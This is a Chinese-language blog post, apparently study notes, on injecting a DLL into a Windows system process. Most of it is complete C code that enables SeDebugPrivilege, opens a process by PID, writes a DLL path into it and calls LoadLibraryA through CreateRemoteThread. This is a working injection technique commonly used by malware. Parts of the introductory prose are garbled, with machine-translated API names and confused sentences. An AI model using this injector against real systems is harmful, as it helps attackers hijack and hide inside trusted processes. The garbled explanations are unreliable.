远程注入（系统进程）

最近在看windows黑客编程的pdf，再看一下破解SESSION的0隔离线程发现。发现直接将dll注入到
系统进程是网上的，试了一下发现行不通，代码也行了。都是在208上测的，而且还有几个
联想的函数有多大差别。然后到不是权限的问题，试了一下确实是

实际的API函数

远程注入：

• 开放式进程
• VirtualAllocEx
• 写进程内存
• 创建远程线程

特权开启：

• OpenProcessToken
• 查找特权值A
• AdjustTokenPrivileges

复现过程

开启SeDebugPrivilege特权

bool EnbalePrivileges() {
        HANDLE hToken = NULL;
        LUID luidValue = { 0 };
        TOKEN_PRIVILEGES tp = { 0 };
        DWORD wdret = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,  &hToken);
        if (wdret == NULL) {
               errorprint("OpenProcessToken");
        }
        BOOL privilege=LookupPrivilegeValueA(NULL,"SeDebugPrivilege",&luidValue); //检索本地唯一性标识符的特定系统上用于局部地（LUID）表示指定的权限名称
        if (privilege == false) {
               errorprint("LookupPrivilegeValueA Privilege:SeDebugPrivilege");
        }
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luidValue;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        bool bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL); //设置特权开启/关闭
        if (bRet == false) {
               errorprint("Enable Privilege Failure\n");
        }
        if (GetLastError() == ERROR_SUCCESS) {
               printf("Enable Privilege:SeDebugPrivilege Sucess\n");
        }
}

完整代码

#include "stdafx.h"
#include <Windows.h>
#define errorprint(name){printf("%s Error Code:%d\n",name,GetLastError());return 1;}
bool EnbalePrivileges() {
        HANDLE hToken = NULL;
        LUID luidValue = { 0 };
        TOKEN_PRIVILEGES tp = { 0 };
        DWORD wdret = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,  &hToken);
        if (wdret == NULL) {
               errorprint("OpenProcessToken");
        }
        BOOL privilege=LookupPrivilegeValueA(NULL,"SeDebugPrivilege",&luidValue);
        if (privilege == false) {
               errorprint("LookupPrivilegeValueA Privilege:SeDebugPrivilege");
        }
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luidValue;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        bool bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
        if (bRet == false) {
               errorprint("Enable Privilege Failure\n");
        }
        if (GetLastError() == ERROR_SUCCESS) {
               printf("Enable Privilege:SeDebugPrivilege Sucess\n");
        }
}
int main()
{
        int pid = 1148;
        EnbalePrivileges();
        char *dllname = "C:\\Users\\JiuShi\\Desktop\\testdll.dll";
        int dllnamesize = strlen(dllname) * 2;
        HANDLE pidmodule = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
        if (pidmodule == NULL) {
               printf("OpenProcess Error Code:%d\n", GetLastError());
               return 1;
        }
        printf("OpenProcess HANDLE 0x%x\n", pidmodule);
        LPVOID vaeAddr = VirtualAllocEx(pidmodule, NULL, dllnamesize, MEM_COMMIT,  PAGE_READWRITE);
        if (vaeAddr == NULL) {
               printf("VirtualAllocEx Error Code:%d\n", GetLastError());
               return 1;
        }
        printf("VirtualAllocEx Sucess 0x%x\n", vaeAddr);
        if (false == WriteProcessMemory(pidmodule, vaeAddr, dllname, dllnamesize, NULL)) {
               printf("WriteProcessMemory Error Code:%d\n", GetLastError());
               return 1;
        }
        printf("WriteProcessMemory Sucess\n");
        FARPROC loadaddress = GetProcAddress(GetModuleHandleA("Kernel32.dll"),  "LoadLibraryA");
        if (loadaddress == NULL) {
               printf("Get Kernel32 Address Error Code:%d\n", GetLastError());
               return 1;
        }
        printf("Get Function LoadlibraryA Function Address:0x%x\n", loadaddress);
        HANDLE runthread = CreateRemoteThread(pidmodule, NULL, 0,  (LPTHREAD_START_ROUTINE)loadaddress, vaeAddr, 0, NULL);
        if (runthread == NULL) {
               printf("CreateRemoteThread Error Code:%d\n", GetLastError());
        }
        printf("CreateRemoteThread Sucess\n");
        system("pause");
    return 0;
}

参考链接

https://blog.csdn.net/weixin_41890599/article/details/108771480